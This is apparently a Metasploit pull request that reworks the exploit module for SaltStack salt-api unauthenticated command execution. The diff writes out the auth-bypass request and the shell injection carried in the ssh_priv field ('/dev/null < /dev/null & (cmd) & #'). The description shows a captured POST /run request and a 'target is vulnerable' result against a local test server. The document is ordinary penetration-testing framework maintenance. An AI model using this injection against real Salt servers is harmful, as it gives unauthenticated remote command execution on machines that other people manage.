### PR TITLE
Enhance exploit/linux/http/saltstack_salt_api_cmd_exec check

### DIFF
--- a/modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb
+++ b/modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb
@@ -85,7 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = execute_command('')
+    # /bin/sh -c 'ssh-keygen -P "" -f /dev/null < /dev/null & # -t rsa -q'
+    res = send_request_cmd_inject('/dev/null < /dev/null & #')
 
     unless res
       return CheckCode::Unknown('Target did not respond to check.')
@@ -118,6 +119,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}") unless cmd.empty?
 
+    # Subshell and background our command injection
+    send_request_cmd_inject("/dev/null < /dev/null & (#{cmd}) & #")
+  end
+
+  def send_request_cmd_inject(cmd_inject)
     # https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html#post--run
     # https://github.com/saltstack/salt/pull/58871
     send_request_cgi(
@@ -129,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'tgt' => '*',
         'fun' => rand_text_alphanumeric(8..42),
         'eauth' => rand_text_alphanumeric(8..42), # Auth bypass
-        'ssh_priv' => "/dev/null < /dev/null; (#{cmd}) & #" # Command injection
+        'ssh_priv' => cmd_inject # Command injection
       }.to_json
     )
   end

--- a/modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb
+++ b/modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    vprint_status("Executing command: #{cmd}") unless cmd.empty?
+    vprint_status("Executing command: #{cmd}")
 
     # Subshell and background our command injection
     send_request_cmd_inject("/dev/null < /dev/null & (#{cmd}) & #")


### PR DESCRIPTION
```
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > check

####################
# Request:
####################
POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/json
Content-Length: 150

{"client":"ssh","tgt":"*","fun":"KIKcU7vy0alpdvdMaOlVg1srPhu0yYJhAQ0I1B","eauth":"DZ2BgeX1vY0j2aCh3","ssh_priv":"/dev/null \u003c /dev/null \u0026 #"}
####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: application/json
Server: CherryPy/18.6.0
Date: Thu, 10 Dec 2020 04:08:16 GMT
Allow: GET, HEAD, POST
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: GET, POST
Access-Control-Allow-Credentials: true
Vary: Accept-Encoding
Content-Length: 16

{"return": [{}]}
[+] 127.0.0.1:8000 - The target is vulnerable. Auth bypass successful.
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) >
```

Updates #14379.